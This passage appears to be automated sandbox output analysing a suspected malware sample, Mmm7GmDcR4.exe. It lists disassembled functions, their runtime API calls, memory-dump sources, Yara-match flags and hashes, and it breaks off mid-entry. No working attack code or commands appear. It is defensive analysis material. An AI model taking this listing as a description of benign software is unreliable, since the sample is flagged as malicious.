                                                                                                • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                                                • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02134FC0
                                                                                                • int.LIBCPMT ref: 02134FD7
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFCA
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFE4
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02134FE0
                                                                                                • std::_Facet_Register.LIBCPMT ref: 02135011
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02135027
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02135045
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                • Instruction ID: 111b744849cf8a40038b24e0b443a2e7070511087c0e6e7d4c666a073f37b646
                                                                                                • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                • Instruction Fuzzy Hash: DF11A072980218EFCB26EBA4D800BED77B7AF48715F540419E815AB2D1DB359A05CF91
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                                                • int.LIBCPMT ref: 00404D70
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 4a39e9fe1a85f8f464df036ee03851cf737efcc67dc368579fe4a290eb6f5d54
                                                                                                • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                                                • Opcode Fuzzy Hash: 4a39e9fe1a85f8f464df036ee03851cf737efcc67dc368579fe4a290eb6f5d54
                                                                                                • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0213C3F7
                                                                                                • int.LIBCPMT ref: 0213C40E
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFCA
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFE4
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0213C417
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0213C448
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0213C45E
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0213C47C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                • Instruction ID: 7a61788dc4aeef28000c96c7133dfc874e473575f2fcbf1469c81d8a9e7327cc
                                                                                                • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                • Instruction Fuzzy Hash: 1011A172980229DFCB16EBA4D840AFD7777AF44725F10441AE815B7291DF349A05CFE1
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 02134E82
                                                                                                • int.LIBCPMT ref: 02134E99
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0213BFCA
                                                                                                  • Part of subcall function 0213BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0213BFE4
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 02134EA2
                                                                                                • std::_Facet_Register.LIBCPMT ref: 02134ED3
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 02134EE9
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02134F07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                • Instruction ID: 2876edcc1d5e9a2154bc1183a601de8fecd5dc64eb2486cf15cea04ba9910f89
                                                                                                • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                • Instruction Fuzzy Hash: D811A971D84219DFCB26EB64D840AEE77B7AF44715F240425D415A72E0DB349A44CF91
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                                                • int.LIBCPMT ref: 0040C1A7
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: e56303121a033718ec8df9e80a9df92df8a78ef35d9196b54dcd961d2f8fa04e
                                                                                                • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                • Opcode Fuzzy Hash: e56303121a033718ec8df9e80a9df92df8a78ef35d9196b54dcd961d2f8fa04e
                                                                                                • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                • int.LIBCPMT ref: 004054F0
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 7606d273a2b39a3806726d8f131ca9af4ca6664aaaef7a77c106dc7564d5aaf0
                                                                                                • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                • Opcode Fuzzy Hash: 7606d273a2b39a3806726d8f131ca9af4ca6664aaaef7a77c106dc7564d5aaf0
                                                                                                • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                • int.LIBCPMT ref: 0040558C
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: 649511da5496efb418c92f466ecb61d50b39daadd1d6a571fd0574edd777844c
                                                                                                • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                • Opcode Fuzzy Hash: 649511da5496efb418c92f466ecb61d50b39daadd1d6a571fd0574edd777844c
                                                                                                • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                • int.LIBCPMT ref: 00404C32
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                  • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2243866535-0
                                                                                                • Opcode ID: cb2d2cb82e8dd4daf92407faa29befccdd6f42253507499591da5c62a58a8f04
                                                                                                • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                • Opcode Fuzzy Hash: cb2d2cb82e8dd4daf92407faa29befccdd6f42253507499591da5c62a58a8f04
                                                                                                • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Mmm7GmDcR4.exe,00000104), ref: 0042F743
                                                                                                • _free.LIBCMT ref: 0042F80E
                                                                                                • _free.LIBCMT ref: 0042F818
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$FileModuleName
                                                                                                • String ID: 0K$C:\Users\user\Desktop\Mmm7GmDcR4.exe
                                                                                                • API String ID: 2506810119-2451788868
                                                                                                • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00404E60
                                                                                                  • Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EAB
                                                                                                • __Getcoll.LIBCPMT ref: 00404EBA
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ECA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                • String ID: \J@
                                                                                                • API String ID: 1836011271-3870157017
                                                                                                • Opcode ID: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                • Instruction ID: fdee6073741f171039223b21022534e6c74e6b1a9002e69b8caf09e8127dea3b
                                                                                                • Opcode Fuzzy Hash: ecd6d36a17cc43e97ba93c01a623e75c6b96a429ac6ca8fec0051df99147ca39
                                                                                                • Instruction Fuzzy Hash: 1E0169719102099FDB10EFA5C441B9DB7B0FF44319F00803EE145BB6C1DB789544CB99
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002), ref: 0042FEF4
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF07
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE85,00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000), ref: 0042FF2A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                • Instruction ID: 04c50191246c36c7712c7b2292fbce18726cdb65abb1a7ec348a7059dfc2f8e8
                                                                                                • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                                                                • Instruction Fuzzy Hash: D8F0C831A10218BBDB109F90DD09B9EBFB4EF05B12F510076F805A2290CF795E44CB8C
                                                                                                APIs
                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE11
                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE35
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE48
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE56
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                • String ID: pScheduler
                                                                                                • API String ID: 3657713681-923244539
                                                                                                • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                • Instruction ID: eb07aeb186abff06dd5fb113d00e985a326b9016228af1cb3add82d84dc8ee7b
                                                                                                • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                                                                • Instruction Fuzzy Hash: 56F05935A40704A3C714FB05DC92CDEB3799E90718760812FE40663182DB7CAD8AC29D
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catchmake_shared
                                                                                                • String ID: MOC$RCC$f)D
                                                                                                • API String ID: 3472968176-2775210027
                                                                                                • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                • Instruction ID: 7195514f0740622b509c856bbb3c0a4aad9542f9d3e8b5c6beab4b244dbdf404
                                                                                                • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                • Instruction Fuzzy Hash: C8F06270584265CFDB16EF65C44066C3B7AAF99B00FC541D1E8585B2B0CB7D9A40DFE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                • Instruction ID: 2e3bf0829218936211b8fbe78eef9e3af5d393ea9c27289860731dd22f60c12d
                                                                                                • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                • Instruction Fuzzy Hash: DF71A571998236DBCB398F64C884ABFBB75FF45358F5442A9EC3167188D7708A41CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                • Instruction ID: 170f1839d68b6508eaaaec35cfa06bac438a8aba58ef65257e70e7e464c4b835
                                                                                                • Opcode Fuzzy Hash: bca2f52f1a06bb0bf5b391d4a2a7ad694c8b7147332e52eee2e888435f9a20d7
                                                                                                • Instruction Fuzzy Hash: 3B71AF31B00266DBCB21CF95E884ABFBB75EF41360B98426BE81067290DB749D45C7E9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                • Instruction ID: 436afe1d97dbb28354204ade5887c6f556974c459cf413a5c8ebdd7ec7809638
                                                                                                • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                • Instruction Fuzzy Hash: E551B432A80304AFDB24DF69D845B7EB7F5FF48724B1446A9E809D7250E736E921CB80
                                                                                                APIs
                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                • _free.LIBCMT ref: 00430B3F
                                                                                                • _free.LIBCMT ref: 00430B56
                                                                                                • _free.LIBCMT ref: 00430B75
                                                                                                • _free.LIBCMT ref: 00430B90
                                                                                                • _free.LIBCMT ref: 00430BA7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                • Instruction ID: 2fc0cbae349d2941fff749f5b49d8ba5872ca9652a97fa93675838e70d9d8155
                                                                                                • Opcode Fuzzy Hash: 77b92977eb72739321cda5c8df294ab32c7ea205dca145f02ee4833a4b4424fc
                                                                                                • Instruction Fuzzy Hash: 3F51D131A00304AFEB219F69D851B6BB7F4EF5C724F14566EE809D7251E739E901CB88
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                • Instruction ID: 702bab6025831ece6c18a3b98075cadf56c70c9d623ed1f76a33165dd8ab65c1
                                                                                                • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                • Instruction Fuzzy Hash: 5E41CF32A40314AFCB14DF78C884A6DB7B6EF89714F1585A9DA19EB381DB31E911CB80
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                • Instruction ID: 2c394445bd20a04972dd2082f140732d1460e75e39bee70d4e52ced8c5000be3
                                                                                                • Opcode Fuzzy Hash: 52f7d06dedb48a2ec426f0ee25480420bcf89ba1a9886730aea307093fcc506c
                                                                                                • Instruction Fuzzy Hash: 7A41C432A00304ABCB10DF78C981A5EB7E5EF89714F15456AE616EB391DB35ED01CB88
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0EA,00000000,00000000,0042D928,?,0042D928,?,00000001,0042D0EA,23E85006,00000001,0042D928,0042D928), ref: 004368DA
                                                                                                • __alloca_probe_16.LIBCMT ref: 00436912
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436963
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436975
                                                                                                • __freea.LIBCMT ref: 0043697E
                                                                                                  • Part of subcall function 00433697: RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3768979899.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Mmm7GmDcR4.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                • Instruction ID: d963c907df35f4e1b8a381e23a898db453a996a2d0481b790983a8c47d787b2f
                                                                                                • Opcode Fuzzy Hash: f65b0bdcdd2dc54c9e9de8c3602f0d94bdb7d7793a3f10faf503cccdbbfc5f31
                                                                                                • Instruction Fuzzy Hash: 5F31F072A0021AABDF259F65DC41EAF7BA5EF44710F15422AFC04D7290EB39CD54CB94
                                                                                                APIs
                                                                                                • _SpinWait.LIBCONCRT ref: 0214B142
                                                                                                  • Part of subcall function 02141178: _SpinWait.LIBCONCRT ref: 02141190
                                                                                                • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0214B156
                                                                                                • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0214B188
                                                                                                • List.LIBCMT ref: 0214B20B
                                                                                                • List.LIBCMT ref: 0214B21A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3770602658.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2130000_Mmm7GmDcR4.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                • String ID:
                                                                                                • API String ID: 3281396844-0
                                                                                                • Opcode ID: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                • Instruction ID: cbfb7cff9f18c476a95d71abb71e8d1ef9783f53cb8ba208b7fd8de14af0bd44
                                                                                                • Opcode Fuzzy Hash: 412e926916d4707ad4bdb87e4df70d0866a2e761e0501b7c3a349567627f0364
                                                                                                • Instruction Fuzzy Hash: 29316932D89656DFCB14EFA4D9906EDB7B2BF04B08F05016AC81967240CF31BA14CB94
                                                                                                APIs
                                                                                                • _SpinWait.LIBCONCRT ref: 0041AEDB
                                                                                                  • Part of subcall function 00410F11: _SpinWait.LIBCONCRT ref: 00410F29
